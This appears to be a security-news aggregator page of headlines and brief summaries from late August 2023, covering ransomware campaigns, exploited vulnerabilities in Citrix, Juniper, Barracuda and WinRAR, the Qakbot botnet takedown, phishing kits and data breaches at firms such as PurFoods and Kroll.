Autosummary: Intelligence X differentiates itself from other search engines: the search works with selectors, i.e. specific search terms such as email addresses, domains, URLs, IPs, CIDRs, Bitcoin addresses, IPFS hashes, etc. Netlas offers a collection of internet intelligence apps that provide accurate technical information on IP addresses, domain names, websites, web applications, IoT devices, and other online assets.


            Phishing-as-a-Service Gets Smarter: Microsoft Sounds Alarm on AiTM Attacks

            financial
            2023-08-29 https://thehackernews.com/2023/08/phishing-as-service-gets-smarter.html
Microsoft is warning of an increase in adversary-in-the-middle (AiTM) phishing techniques, which are being propagated as part of the phishing-as-a-service (PhaaS) cybercrime model. In addition to an uptick in AiTM-capable PhaaS platforms, the tech giant noted that existing phishing services like PerSwaysion are incorporating AiTM capabilities. "This development in the PhaaS ecosystem enables


            Easy-to-exploit Skype vulnerability reveals users’ IP address

            exploits
            2023-08-29 https://www.helpnetsecurity.com/2023/08/29/skype-vulnerability-ip-address/

            A vulnerability in Skype mobile apps can be exploited by attackers to discover a user’s IP address – a piece of information that may endanger individuals whose physical security depends on their general location remaining secret. The vulnerability The security vulnerability has been discovered by a security researcher named Yossi, who privately reported it to Microsoft and demonstrated its effective exploitation to journalist Joseph Cox. Vulnerability specifics have not been publicly shared since it has … More


            Citrix NetScaler Alert: Ransomware Hackers Exploiting Critical Vulnerability

            exploits ransomware
            2023-08-29 https://thehackernews.com/2023/08/citrix-netscaler-alert-ransomware.html
Unpatched Citrix NetScaler systems exposed to the internet are being targeted by unknown threat actors in what's suspected to be a ransomware attack. Cybersecurity company Sophos is tracking the activity cluster under the moniker STAC4663. Attack chains involve the exploitation of CVE-2023-3519, a critical code injection vulnerability impacting NetScaler ADC and Gateway servers that could


            Hackers exploit critical Juniper RCE bug chain after PoC release

            exploits
            2023-08-29 https://www.bleepingcomputer.com/news/security/hackers-exploit-critical-juniper-rce-bug-chain-after-poc-release/
Hackers have started using a critical exploit chain to target Juniper EX switches and SRX firewalls via their Internet-exposed J-Web configuration interface. [...]

Autosummary: One week after Juniper disclosed and released security updates to patch the four flaws that can be chained to achieve remote code execution, watchTowr Labs security researchers released a proof-of-concept (PoC) exploit targeting the SRX firewall bugs (tracked as CVE-2023-36846 and CVE-2023-36845).


            University of Michigan shuts down network after cyberattack

            ciber
            2023-08-29 https://www.bleepingcomputer.com/news/security/university-of-michigan-shuts-down-network-after-cyberattack/
The University of Michigan has taken all of its systems and services offline to deal with a cybersecurity incident, causing a widespread impact on online services the night before classes started. [...]

Autosummary: Zoom, Adobe Cloud, Dropbox, Slack, Google, Canvas, and Adobe Cloud services have been restored and can be accessed from outside networks, although their availability is unstable due to overload.


            US govt email servers hacked in Barracuda zero-day attacks

            exploits
            2023-08-29 https://www.bleepingcomputer.com/news/security/us-govt-email-servers-hacked-in-barracuda-zero-day-attacks/
Suspected Chinese hackers disproportionately targeted and breached government and government-linked organizations worldwide in recent attacks targeting a Barracuda Email Security Gateway (ESG) zero-day, with a focus on entities across the Americas. [...]

Autosummary: "Notably, among North American identified affected organizations, there were numerous state, provincial, county, tribal, city, and town offices that were targeted in this campaign," Mandiant said.


            LogRhythm and Cimcor collaborate to enhance cyberattack protection for organizations

            ciber
            2023-08-29 https://www.helpnetsecurity.com/2023/08/29/logrhythm-cimcor/

            LogRhythm and Cimcor have joined forces to help organizations around the globe increase visibility and protect against modern cyberattacks. This partnership leverages LogRhythm’s comprehensive security information and event management (SIEM) platform and Cimcor’s file integrity monitoring (FIM) solution, CimTrak. LogRhythm’s integration with CimTrak allows LogRhythm to ingest integrity data that can identify zero-day attacks, ransomware activity, and configuration vulnerabilities. These issues can then be addressed either manually or automatically by reverting to any of the … More

Autosummary: CimTrak works across multiple operating systems and device types, managing files, directories, configurations, users, groups, policies, active directories, database schemas, cloud configurations, hypervisors, containers, network devices, ports, and more.


            Ransomware group exploits Citrix NetScaler systems for initial access

            exploits
            2023-08-29 https://www.helpnetsecurity.com/2023/08/29/citrix-netscaler-ransomware/

            A known threat actor specializing in ransomware attacks is believed to be behind a recent campaign that targeted unpatched internet-facing Citrix NetScaler systems to serve as an initial foothold into enterprise networks. “Our data indicates strong similarity between attacks using CVE-2023-3519 and previous attacks using a number of the same TTPs,” Sophos researchers shared. Citrix systems under attack In mid-July 2023, a zero-day remote code execution (RCE) vulnerability (CVE-2023-3519) started getting exploited in the wild. … More


            Chinese Hacking Group Exploits Barracuda Zero-Day to Target Government, Military, and Telecom

            exploits government
            2023-08-29 https://thehackernews.com/2023/08/chinese-hacking-group-exploits.html
A suspected Chinese-nexus hacking group exploited a recently disclosed zero-day flaw in Barracuda Networks Email Security Gateway (ESG) appliances to breach government, military, defense and aerospace, high-tech industry, and telecom sectors as part of a global espionage campaign. Mandiant, which is tracking the activity under the name UNC4841, described the threat actor as "highly responsive to

Autosummary: Further analysis of the campaign has revealed a "distinct fall off in activity from approximately January 20 to January 22, 2023," coinciding with the beginning of the Chinese New Year, followed by two surges, one after Barracuda's public notification on May 23, 2023, and a second one in early June 2023.


            DarkGate Malware Activity Spikes as Developer Rents Out Malware to Affiliates

            exploits
            2023-08-29 https://thehackernews.com/2023/08/darkgate-malware-activity-spikes-as.html
A new malspam campaign has been observed deploying an off-the-shelf malware called DarkGate. "The current spike in DarkGate malware activity is plausible given the fact that the developer of the malware has recently started to rent out the malware to a limited number of affiliates," Telekom Security said in a report published last week. The latest findings build on recent findings from security

Autosummary: Phishing attacks are a primary delivery pathway for stealers, trojans, and malware loaders such as KrakenKeylogger, QakBot, Raccoon Stealer, SmokeLoader, and others, with threat actors continuously adding new features and enhancements to expand their functionalities.


            New Android MMRat malware uses Protobuf protocol to steal your data

            exploits
            2023-08-29 https://www.bleepingcomputer.com/news/security/new-android-mmrat-malware-uses-protobuf-protocol-to-steal-your-data/
A novel Android banking malware named MMRat utilizes a rarely used communication method, protobuf data serialization, to more efficiently steal data from compromised devices. [...]

Autosummary: MMRat's main functions can be summed up as follows: collect network, screen, and battery information; exfiltrate the user's contact list and list of installed apps; capture user input via keylogging; capture real-time screen content from the device by abusing the MediaProjection API; record and live-stream camera data; record and dump screen data in text form dumps that are exfiltrated to the C2; uninstall itself from the device to wipe all evidence of infection. All commands supported by the malware (Trend Micro). MMRat's ability to capture real-time screen content, and even its more rudimentary "user terminal state" method that extracts text data requiring reconstruction, both demand efficient data transmission.


            Qakbot botnet disrupted, malware removed from 700,000+ victim computers

            exploits
            2023-08-29 https://www.helpnetsecurity.com/2023/08/29/qakbot-botnet-disrupted-malware-removed/

            The Qakbot botnet has been crippled by the US Department of Justice (DOJ): 52 of its servers have been seized and the popular malware loader has been removed from over 700,000 victim computers around the world. “To disrupt the botnet, the FBI was able to redirect Qakbot botnet traffic to and through servers controlled by the FBI, which in turn instructed infected computers in the United States and elsewhere to download a file created by … More

Autosummary: Qakbot malware removed from infected computers: according to the DOJ, 200,000 of the infected computers are located in the US, the rest worldwide, including in the countries whose law enforcement agencies have also been involved in the operation: France, Germany, the Netherlands, the United Kingdom, Romania, and Latvia.


            Tanium Vulnerability Risk and Compliance for ServiceNow accelerates security investigations

            exploits
            2023-08-29 https://www.helpnetsecurity.com/2023/08/29/tanium-vulnerability-risk-and-compliance-for-servicenow/

Tanium announced Tanium Vulnerability Risk and Compliance for ServiceNow – a new solution enabling ServiceNow customers to identify security risks from vulnerabilities and non-compliant configurations and remediate all from within the ServiceNow platform. The integrated offering allows customers to accelerate their security incident lifecycle by reducing the number of manual investigation steps and augmenting ServiceNow processes with the speed and scale of Tanium. Tanium’s XEM platform provides a unified interface in which related incident data … More


            How the FBI nuked Qakbot malware from infected Windows PCs

            exploits
            2023-08-29 https://www.bleepingcomputer.com/news/security/how-the-fbi-nuked-qakbot-malware-from-infected-windows-pcs/
The FBI announced today the disruption of the Qakbot botnet in an international law enforcement operation that not only seized infrastructure but also uninstalled the malware from infected devices. [...]

Autosummary: In the past, Qakbot has partnered with multiple ransomware operations, including Conti, ProLock, Egregor, REvil, RansomExx, MegaCortex, and, most recently, Black Basta and BlackCat/ALPHV. Based on their investigation, the FBI determined that the Qakbot botnet utilized Tier-1, Tier-2, and Tier-3 command and control servers, which are used to issue commands to execute, install malware updates, and download additional partner payloads to devices.


            DreamBus malware exploits RocketMQ flaw to infect servers

            exploits
            2023-08-29 https://www.bleepingcomputer.com/news/security/dreambus-malware-exploits-rocketmq-flaw-to-infect-servers/
            A new version of the DreamBus botnet malware exploits a critical-severity remote code execution vulnerability in RocketMQ servers to infect devices. [...] "

            Autosummary: Earlier versions of the DreamBus malware are also known to target Redis, PostgreSQL, Hadoop YARN, Apache Spark, HashiCorp Consul, and SaltStack, so following good patch management across all software products is recommended to tackle this threat. "


            FBI confirms Barracuda patch is not effective for exploited ESG appliances

            exploits
            2023-08-29 https://www.malwarebytes.com/blog/news/2023/08/barracuda-patch-is-not-effective-warns-fbi

            Categories: Exploits and vulnerabilities

            Categories: News

            Tags: Barracuda ESG

            Tags: CVE-2023-2868

            Tags: SEASPY

            Tags: SUBMARINE

            Tags: WHIRLPOOL

            The FBI repeats the warning by Barracuda that all ESG appliances should immediately be replaced because the patch was ineffective.


            The post FBI confirms Barracuda patch is not effective for exploited ESG appliances appeared first on Malwarebytes Labs.

            "

            Autosummary: Investigation steps may include:
            - Review email logs to identify the initial point of exposure
            - Revoke and rotate all domain-based and local credentials that were on the ESG at the time of compromise
            - Revoke and reissue all certificates that were on the ESG at the time of compromise
            - Monitor the entire network for the use of credentials that were on the ESG at the time of compromise
            - Review network logs for signs of data exfiltration and lateral movement
            - Capture a forensic image of the appliance and conduct a forensic analysis
            We don’t just report on vulnerabilities—we identify them, and prioritize action. "


            "An influx of Elons," a hospital visit, and magic men: Becky Holmes shares more romance scams: Lock and Code S04E18

            financial
            2023-08-29 https://www.malwarebytes.com/blog/podcast/2023/08/an-influx-of-elons-a-hospital-visit-and-magic-men:-becky-holmes-shares-more-romance-scams

            Categories: Podcast

            This week on the Lock and Code podcast, we speak with Becky Holmes about how she flips the script on romance scammers, and what more governments should be doing to help.


            The post "An influx of Elons," a hospital visit, and magic men: Becky Holmes shares more romance scams: Lock and Code S04E18 appeared first on Malwarebytes Labs.

            "



            Cisco VPNs without MFA are under attack by ransomware operator

            exploits ransomware
            2023-08-29 https://www.malwarebytes.com/blog/news/2023/08/vpns-without-mfa-are-under-attack-by-ransomware-operator

            Categories: Business

            Categories: News

            Tags: Cisco

            Tags: VPN

            Tags: Akira

            Tags: ransomware

            Tags: brute-force

            Tags: credential stuffing

            Tags: password spraying

            Several researchers are seeing ransomware attacks targeting Cisco VPNs without MFA


            The post Cisco VPNs without MFA are under attack by ransomware operator appeared first on Malwarebytes Labs.

            "

            Autosummary: Posted: August 29, 2023 by Several researchers are seeing ransomware attacks targeting Cisco VPNs without MFA. The Cisco Product Security Incident Response Team (PSIRT) has posted a blog about Akira ransomware targeting VPNs without Multi-Factor Authentication (MFA). Once you’ve isolated the outbreak and stopped the first attack, you must remove every trace of the attackers, their malware, their tools, and their methods of entry, to avoid being attacked again. Deploy Endpoint Detection and Response software like Malwarebytes EDR that uses multiple different detection techniques to identify ransomware, and ransomware rollback to restore damaged system files. "


            Meal delivery service PurFoods announces major data breach

            financial
            2023-08-29 https://www.malwarebytes.com/blog/news/2023/08/meal-delivery-service-purfoods-announces-major-data-breach

            Categories: Business

            Tags: purfoods

            Tags: breach

            Tags: ransomware

            Tags: data

            Tags: information

            We take a look at a breach notice from food delivery service PurFoods.


            The post Meal delivery service PurFoods announces major data breach appeared first on Malwarebytes Labs.

            "

            Autosummary: The data potentially at risk, which is quite significant, includes:
            - Date of birth
            - Driver’s license/state identification number
            - Financial account information
            - Payment card information
            - Medical record number
            - Medicare and/or Medicaid identification
            - Health information
            - Treatment information
            - Diagnosis code
            - Meal category and/or cost
            - Health insurance information
            - Patient ID number
            Social Security numbers were involved for less than 1% of the total population, most of which are internal to PurFoods. From its site: We work with over 500 health plans, managed care organisations, governments, and agencies to provide access to meals for people covered under Medicare and Medicaid, as well as the opportunity for individuals to order meals on their own. Once you’ve isolated the outbreak and stopped the first attack, you must remove every trace of the attackers, their malware, their tools, and their methods of entry, to avoid being attacked again. "


            Ready to enhance your continuous assessment efforts? Meet PlexTrac

            ransomware
            2023-08-28 https://grahamcluley.com/feed-sponsor-plextrac-3/
            Graham Cluley Security News is sponsored this week by the folks at PlexTrac. Thanks to the great team there for their support! If you are investing in solutions for continuous assessment and validation or breach and attack simulation, you know that managing the data and remediation efforts necessary to make real progress can be overwhelming. … Continue reading "Ready to enhance your continuous assessment efforts? Meet PlexTrac" "



            What true diversity in the cybersecurity industry looks like

            industry ciber
            2023-08-28 https://www.helpnetsecurity.com/2023/08/28/diversity-cybersecurity-industry-video/

            In this Help Net Security video, Larry Whiteside, Jr., CISO at RegScale and President of Cyversity, discusses how, now more than ever, the cybersecurity industry needs the diversity of thought to address the increasingly complex and technology-driven challenges organizations face.

            The post What true diversity in the cybersecurity industry looks like appeared first on Help Net Security.

            "



            KmsdBot Malware Gets an Upgrade: Now Targets IoT Devices with Enhanced Capabilities

            exploits industry
            2023-08-28 https://thehackernews.com/2023/08/kmsdbot-malware-gets-upgrade-now.html
            An updated version of a botnet malware called KmsdBot is now targeting Internet of Things (IoT) devices, simultaneously branching out its capabilities and the attack surface. "The binary now includes support for Telnet scanning and support for more CPU architectures," Akamai security researcher Larry W. Cashdollar said in an analysis published this month. The latest iteration, "

            Autosummary: "The ongoing activities of the KmsdBot malware campaign indicate that IoT devices remain prevalent and vulnerable on the internet, making them attractive targets for building a network of infected systems," Cashdollar said. "


            Exploit released for Juniper firewall bugs allowing RCE attacks

            exploits
            2023-08-28 https://www.bleepingcomputer.com/news/security/exploit-released-for-juniper-firewall-bugs-allowing-rce-attacks/
            Proof-of-concept exploit code has been publicly released for vulnerabilities in Juniper SRX firewalls that, when chained, can allow unauthenticated attackers to gain remote code execution in Juniper’s JunOS on unpatched devices. [...] "

            Autosummary: watchTowr Labs security researchers have since developed and released a proof-of-concept (PoC) exploit that chains the SRX firewall flaws, a missing authentication for critical function vulnerability (CVE-2023-36846) and a PHP external variable modification bug (CVE-2023-36845). "


            Mom’s Meals discloses data breach impacting 1.2 million people

            financial
            2023-08-28 https://www.bleepingcomputer.com/news/security/moms-meals-discloses-data-breach-impacting-12-million-people/
            PurFoods, which conducts business in the U.S. as "Mom’s Meals," is warning of a data breach after the personal information of 1.2 million customers and employees was stolen in a ransomware attack. [...] "



            Four common password mistakes hackers love to exploit

            exploits
            2023-08-28 https://www.bleepingcomputer.com/news/security/four-common-password-mistakes-hackers-love-to-exploit/
            Threat actors take advantage of common password mistakes to breach corporate networks. Learn more from Specops Software on the four most common mistakes and how to strengthen your Active Directory against these risks. [...] "

            Autosummary: First, an effective password policy that ensures users’ passwords are strong in the first place mitigates against dictionary and brute force attacks that prey on common base terms, short password length, and keyboard walk patterns. Specops Password Policy allows organizations to create custom dictionaries to block base words related to their organization and industry, as well as blocking universally weak base terms, keyboard walk patterns, and short passwords.
            Keyboard walk patterns
            We usually think about weak, predictable passwords in terms of common base words, short length, and lack of complexity. Then a way to easily audit your Active Directory and make sure any strong passwords that become compromised through your own breach, or one elsewhere due to password reuse, are quickly changed. "


            Cyberattacks Targeting E-commerce Applications

            ciber
            2023-08-28 https://thehackernews.com/2023/08/cyberattacks-targeting-e-commerce.html
            Cyber attacks on e-commerce applications are a common trend in 2023: as e-commerce businesses become more omnichannel, they build and deploy increasingly more API interfaces, and threat actors are constantly exploring more ways to exploit vulnerabilities. This is why regular testing and ongoing monitoring are necessary to fully protect web applications, identifying weaknesses so they can be "

            Autosummary: 8 Areas of Vulnerability Testing:
            - Web Application-Based Vulnerability Assessment
            - API-Based Vulnerability Assessment
            - Network-Based Vulnerability Assessment
            - Host-Based Vulnerability Assessment
            - Physical Vulnerability Assessment
            - Wireless Network Vulnerability Assessment
            - Cloud-Based Vulnerability Assessment
            - Social Engineering Vulnerability Assessment
            The 6 Phases of Vulnerability Assessment Methodology:
            - Determine critical and high-risk assets
            - Perform a vulnerability assessment
            - Conduct vulnerability analysis and risk assessment
            - Remediate any vulnerability, e.g., applying security patches or fixing configuration issues.
            The Importance of E-commerce Application Security Testing: E-commerce application security testing is essential to protect the personal and financial information of everyone linked to the application, including customers, dealers, and vendors.
            The 2023 Honda E-commerce Platform Attack: Honda’s power equipment, lawn, garden, and marine products commerce platform contained an API flaw that enabled anyone to request a password reset for any account. In this article, we will discuss the recent Honda e-commerce platform attack, how it happened, and its impact on the business and its clients. "


            Spain warns of LockBit Locker ransomware phishing attacks

            financial exploits ransomware
            2023-08-28 https://www.bleepingcomputer.com/news/security/spain-warns-of-lockbit-locker-ransomware-phishing-attacks/
            The National Police of Spain is warning of an ongoing "LockBit Locker" ransomware campaign targeting architecture companies in the country through phishing emails. [...] "

            Autosummary: IMG file contents (Source: BleepingComputer)
            BleepingComputer’s analysis shows that the executed Python script will check if the user is an admin of the device, and if so, make modifications to the system for persistence and then execute the "LockBit Locker" ransomware to encrypt files. "


            Experts Uncover How Cybercriminals Could Exploit Microsoft Entra ID for Elevated Privilege

            exploits ciber
            2023-08-28 https://thehackernews.com/2023/08/experts-uncover-how-cybercriminals.html
            Cybersecurity researchers have discovered a case of privilege escalation associated with a Microsoft Entra ID (formerly Azure Active Directory) application by taking advantage of an abandoned reply URL. "An attacker could leverage this abandoned URL to redirect authorization codes to themselves, exchanging the ill-gotten authorization codes for access tokens," Secureworks Counter Threat Unit ( "



            Attacks on Citrix NetScaler systems linked to ransomware actor

            exploits ransomware
            2023-08-28 https://www.bleepingcomputer.com/news/security/attacks-on-citrix-netscaler-systems-linked-to-ransomware-actor/
            A threat actor believed to be tied to the FIN8 hacking group exploits the CVE-2023-3519 remote code execution flaw to compromise unpatched Citrix NetScaler systems in domain-wide attacks. [...] "

            Autosummary: Sophos has been monitoring this campaign since mid-August, reporting that the threat actor performs payload injections, uses BlueVPS for malware staging, deploys obfuscated PowerShell scripts, and drops PHP webshells on victim machines. "


            Rhysida claims ransomware attack on Prospect Medical, threatens to sell data

            exploits ransomware
            2023-08-27 https://www.bleepingcomputer.com/news/security/rhysida-claims-ransomware-attack-on-prospect-medical-threatens-to-sell-data/
            The Rhysida ransomware gang has claimed responsibility for the massive cyberattack on Prospect Medical Holdings, claiming to have stolen 500,000 social security numbers, corporate documents, and patient records. [...] "

            Autosummary: "They kindly provided: more than 500000 SSN, passports of their clients and employees, driver’s licenses, patient files (profile, medical history), financial and legal documents!!!," reads the Rhysida data leak site. "


            Kroll Suffers Data Breach: Employee Falls Victim to SIM Swapping Attack

            financial
            2023-08-26 https://thehackernews.com/2023/08/kroll-suffers-data-breach-employee.html
            Risk and financial advisory solutions provider Kroll on Friday disclosed that one of its employees fell victim to a "highly sophisticated" SIM swapping attack. The incident, which took place on August 19, 2023, targeted the employee’s T-Mobile account, the company said. "Specifically, T-Mobile, without any authority from or contact with Kroll or its employee, transferred that employee’s phone "



            LockBit 3.0 Ransomware Builder Leak Gives Rise to Hundreds of New Variants

            exploits ransomware
            2023-08-26 https://thehackernews.com/2023/08/lockbit-30-ransomware-builder-leak.html
            The leak of the LockBit 3.0 ransomware builder last year has led to threat actors abusing the tool to spawn new variants. Russian cybersecurity company Kaspersky said it detected a ransomware intrusion that deployed a version of LockBit but with a markedly different ransom demand procedure. "The attacker behind this incident decided to use a different ransom note with a headline related to a "

            Autosummary: The disclosure comes as Netenrich delved into a ransomware strain called ADHUBLLKA that has rebranded several times since 2019 (BIT, LOLKEK, OBZ, U2K, and TZW), while targeting individuals and small businesses in exchange for meager payouts in the range of $800 to $1,600 from each victim. "In 81% of ransomware attacks, the final payload was launched outside of traditional working hours, and for those that were deployed during business hours, only five happened on a weekday," the cybersecurity company said. "


            Cybersecurity insurance is missing the risk

            ciber
            2023-08-25 https://www.helpnetsecurity.com/2023/08/25/cyber-insurance-industry/

            Cybersecurity insurance is a rapidly growing market, swelling from approximately $13B in 2022 to an estimated $84B in 2030 (26% CAGR), but insurers are struggling with quantifying the potential risks of offering this type of insurance. The traditional actuary models do not apply well to an environment where highly motivated, creative, and intelligent attackers are dynamically pursuing actions that cause insurable events. Accurate estimation of losses is key to determining customer premiums. But even after … More

            The post Cybersecurity insurance is missing the risk appeared first on Help Net Security.

            "

            Autosummary: At maximum, they want a 70% loss ratio to cover their payouts and expenses and, according to the National Association of Insurance Commissioners Report on the Cyber Insurance Market in 2021, nearly half of the top 20 insurers, representing 83% of the market, failed to achieve the desired loss ratio. As part of that continuous exercise, there are opportunities to apply best practices to the insurance model to identify the most relevant aspects that include defensive postures (technology, behaviors, and processes) and understanding the relevant threat actors (targets, capabilities, and methods) to determine the residual risks. "


            Ransomware dwell time hits new low

            exploits
            2023-08-25 https://www.helpnetsecurity.com/2023/08/25/ransomware-attack-dwell-time/

            Median attacker dwell time—the time from when an attack starts to when it’s detected—shrunk from 10 to eight days for all attacks, and to five days for ransomware attacks during the first half of 2023, according to Sophos. In 2022, the median dwell time decreased from 15 to 10 days.
            Gaining control of Active Directory
            In addition, Sophos X-Ops found that it took on average less than a day—approximately 16 hours—for attackers to reach Active … More

            The post Ransomware dwell time hits new low appeared first on Help Net Security.

            "

            Autosummary: “The impact, escalation, and recovery overhead of an Active Directory attack is why it’s targeted,” said John Shier, field CTO, Sophos. “They can linger undetected to determine their next move, and, once they’re ready to go, they can blast through a victim’s network unimpeded,” Shier continued. "


            Unrealistic expectations exacerbate the cybersecurity talent shortage

            ciber
            2023-08-25 https://www.helpnetsecurity.com/2023/08/25/cybersecurity-talent-shortage-expectations/

            Consumers believe today’s cybersecurity talent shortage is in large part due to limited exposure to the profession and a lack of cybersecurity education and training at a younger age within school systems, according to ThreatX. 90% of consumers polled say they have concerns about the future of cybersecurity if more isn’t done at an earlier stage to expose students to the field, and 62% agree that if they or their child had more established education … More

            The post Unrealistic expectations exacerbate the cybersecurity talent shortage appeared first on Help Net Security.

            "

            Autosummary: “With more than 3.4 million cybersecurity jobs still open worldwide, the cybersecurity industry is in desperate need of professionals, but at the same time, it’s still hard to get into the industry – both due to the unrealistic expectations of practitioners hiring today, but also in part due to limited exposure early on showcasing what’s available in this field, as our survey results have found,” said Gene Fay, CEO at ThreatX. “To close the cybersecurity talent gap, security vendors and education systems will need to partner to create more opportunities from mentorship and learning in schools, to considering more diverse candidates who might not meet today’s rigid degree requirements,” Fay continued. "


            Kroll data breach exposes info of FTX, BlockFi, Genesis creditors

            financial
            2023-08-25 https://www.bleepingcomputer.com/news/security/kroll-data-breach-exposes-info-of-ftx-blockfi-genesis-creditors/
            Multiple reports on social media warn of a data breach at financial and risk advisory company Kroll that resulted in the personal data of some credit claimants being exposed to an unauthorized third party. [...] "



            Lazarus Group exploited ManageEngine vulnerability to target critical infrastructure

            exploits
            2023-08-25 https://www.helpnetsecurity.com/2023/08/25/lazarus-group-manageengine/

            North Korean state-sponsored hackers Lazarus Group have been exploiting a ManageEngine ServiceDesk vulnerability (CVE-2022-47966) to target internet backbone infrastructure and healthcare institutions in Europe and the US. The group leveraged the vulnerability to deploy QuiteRAT, downloaded from an IP address previously associated with the Lazarus hacking group (aka APT38).
            QuiteRAT
            CVE-2022-47966 was patched in mid-January 2023, and soon after a PoC exploit for it was publicly released and exploitation attempts started in earnest. The … More

            The post Lazarus Group exploited ManageEngine vulnerability to target critical infrastructure appeared first on Help Net Security.

            "

            Autosummary: Its capabilities include arbitrary command execution, managing files of the infected endpoint, gathering of system information, reverse shell creation, spawning of new processes that allow download and deployment of additional payloads, and finally, the ability to self-delete from the compromised endpoint (when directed by the C2). "


            Data breach at French govt agency exposes info of 10 million people

            financial
            2023-08-25 https://www.bleepingcomputer.com/news/security/data-breach-at-french-govt-agency-exposes-info-of-10-million-people/
            Pôle emploi, France’s governmental unemployment registration and financial aid agency, is informing of a data breach that exposed data belonging to 10 million individuals. [...] "

            Autosummary: Financial aid programs unaffected
            The exposed information includes full names and social security numbers, while email addresses, phone numbers, passwords, and banking data have not been affected by this data leak. "


            Teenage members of Lapsus$ ransomware gang convicted

            exploits ransomware
            2023-08-25 https://www.malwarebytes.com/blog/news/2023/08/teenage-lapsus-members-convinced-by-british-court

            Categories: Business

            Tags: business

            Tags: hack

            Tags: hacked

            Tags: compromise

            Tags: lapsus$

            Tags: convicted

            Tags: crime

            Tags: ransomware

            Tags: leak

            Tags: breach

            A wave of video game developer compromises has come to a court-based conclusion.


            The post Teenage members of Lapsus$ ransomware gang convicted appeared first on Malwarebytes Labs.

            "

            Autosummary: Once you’ve isolated the outbreak and stopped the first attack, you must remove every trace of the attackers, their malware, their tools, and their methods of entry, to avoid being attacked again. No ransom was paid, despite the attackers claiming to have source code belonging to Orange, BT, and EE in text messages sent out to 26,000 EE customers. There is no way that somebody in this situation, with their details leaked, and their hands caught in the cookie jar, would keep going. The infamous Lapsus$ ransomware gang gained notoriety for a number of attacks against companies involved in game development, or companies closely associated with gaming, such as Nvidia. "


            Smart lightbulb and app vulnerability puts your Wi-Fi password at risk

            exploits
            2023-08-25 https://www.malwarebytes.com/blog/news/2023/08/smart-light-bulb-and-app-vulnerability-puts-your-wi-fi-password-at-risk

            Categories: Business

            Tags: business

            Tags: home

            Tags: personal

            Tags: router

            Tags: wi-fi

            Tags: wireless

            Tags: network

            Tags: home

            Tags: bulb

            Tags: smart bulb

            Tags: IoT

            Tags: app

            Tags: TP-Link

            We take a look at reports that a smart lightbulb and app vulnerability could potentially put your Wi-Fi password at risk.


            The post Smart lightbulb and app vulnerability puts your Wi-Fi password at risk appeared first on Malwarebytes Labs.

            "

            Autosummary: The other high severity flaw, with a CVSS of 8.8, is related to incorrect authentication of the bulb, which means the device can be impersonated, allowing for Tapo password theft and device manipulation. You should also do this for all of your other smart appliances: baby monitors, webcams, security systems, and utility service controls. "


            Hackers use public ManageEngine exploit to breach internet org

            exploits
            2023-08-24 https://www.bleepingcomputer.com/news/security/hackers-use-public-manageengine-exploit-to-breach-internet-org/
            The North Korean state-backed hacker group tracked as Lazarus has been exploiting a critical vulnerability (CVE-2022-47966) in Zoho’s ManageEngine ServiceDesk to compromise an internet backbone infrastructure provider and healthcare organizations. [...] "

            Autosummary: The capabilities of CollectionRAT include arbitrary command execution, file management, system information gathering, reverse shell creation, new process spawning, fetching and launching new payloads, and self-deletion. "


            Talon unveils digital experience capabilities, equipping IT teams with advanced metrics

            industry
            2023-08-24 https://www.helpnetsecurity.com/2023/08/24/talon-digital-experience-capabilities/

            Talon Cyber Security has released new digital experience capabilities available in the Talon Enterprise Browser. The capabilities arm IT teams with advanced metrics on device, application, and network performance to ensure that issues can be proactively resolved, and employees have consistent user experiences that power productivity. “In today’s work-from-anywhere world, it is mission critical that security tools do not negatively impact the user experiences that workforces expect,” said Ohad Bobrov, CTO, Talon Cyber Security. “By … More

            The post Talon unveils digital experience capabilities, equipping IT teams with advanced metrics appeared first on Help Net Security.

            "



            Cloud hosting firms hit by devastating ransomware attack

            exploits ransomware
            2023-08-24 https://www.helpnetsecurity.com/2023/08/24/cloudnordic-azero-ransomware/

            Danish cloud hosting firms CloudNordic and Azero – both owned by Certiqa Holding – have suffered a ransomware attack that resulted in most customer data being stolen and systems and servers rendered inaccessible.
            The CloudNordic and Azero ransomware attack
            In the early morning hours of Friday, August 18, the attackers shut down all systems. The companies believe the attack happened while they were transferring servers from one data center to another. “Despite the fact that … More

            The post Cloud hosting firms hit by devastating ransomware attack appeared first on Help Net Security.

            "



            New Telegram Bot "Telekopye" Powering Large-scale Phishing Scams from Russia

            financial
            2023-08-24 https://thehackernews.com/2023/08/new-telegram-bot-telekopye-powering.html
            A new financially motivated operation is leveraging a malicious Telegram bot to help threat actors scam their victims. Dubbed Telekopye, a portmanteau of Telegram and kopye (meaning "spear" in Russian), the toolkit functions as an automated means to create a phishing web page from a premade template and send the URL to potential victims, codenamed Mammoths by the criminals. "This toolkit is "

            Autosummary: Telekopye is fully-featured, allowing its users to send phishing emails, generate web pages, send SMS messages, create QR codes, and create convincing images and screenshots of checks and receipts. "


            New "Whiffy Recon" Malware Triangulates Infected Device Location via Wi-Fi Every Minute

            exploits
            2023-08-24 https://thehackernews.com/2023/08/new-whiffy-recon-malware-triangulates.html
            The SmokeLoader malware is being used to deliver a new Wi-Fi scanning malware strain called Whiffy Recon on compromised Windows machines. "The new malware strain has only one operation. Every 60 seconds it triangulates the infected systems’ positions by scanning nearby Wi-Fi access points as a data point for Google’s geolocation API," Secureworks Counter Threat Unit (CTU) said in a statement "

            Autosummary: The malware is also configured to register with a remote command-and-control (C2) server by passing along a randomly generated "botID" in an HTTP POST request, following which the server responds with a success message and a secret unique identifier that’s subsequently saved in a file named "%APPDATA%\Roaming\wlan\str-12.bin". The second phase of the attack involves scanning for Wi-Fi access points via the Windows WLAN API every 60 seconds. "


            WinRAR Security Flaw Exploited in Zero-Day Attacks to Target Traders

            exploits
            2023-08-24 https://thehackernews.com/2023/08/winrar-security-flaw-exploited-in-zero.html
            A recently patched security flaw in the popular WinRAR archiving software has been exploited as a zero-day since April 2023, new findings from Group-IB reveal. The vulnerability, cataloged as CVE-2023-38831, allows threat actors to spoof file extensions, thereby making it possible to launch malicious scripts contained within an archive that masquerades as seemingly innocuous image or text files. "

            Autosummary: As a result, when a victim clicks on the image, a batch script present within the folder is executed instead, which is then used to launch the next stage, an SFX CAB archive designed to extract and launch additional files. "


            Ransomware hackers dwell time drops to 5 days, RDP still widely used

            exploits
            2023-08-24 https://www.bleepingcomputer.com/news/security/ransomware-hackers-dwell-time-drops-to-5-days-rdp-still-widely-used/
            Ransomware threat actors are spending less time on compromised networks before security solutions sound the alarm. In the first half of the year the hackers' median dwell time dropped to five days from nine in 2022 [...] "

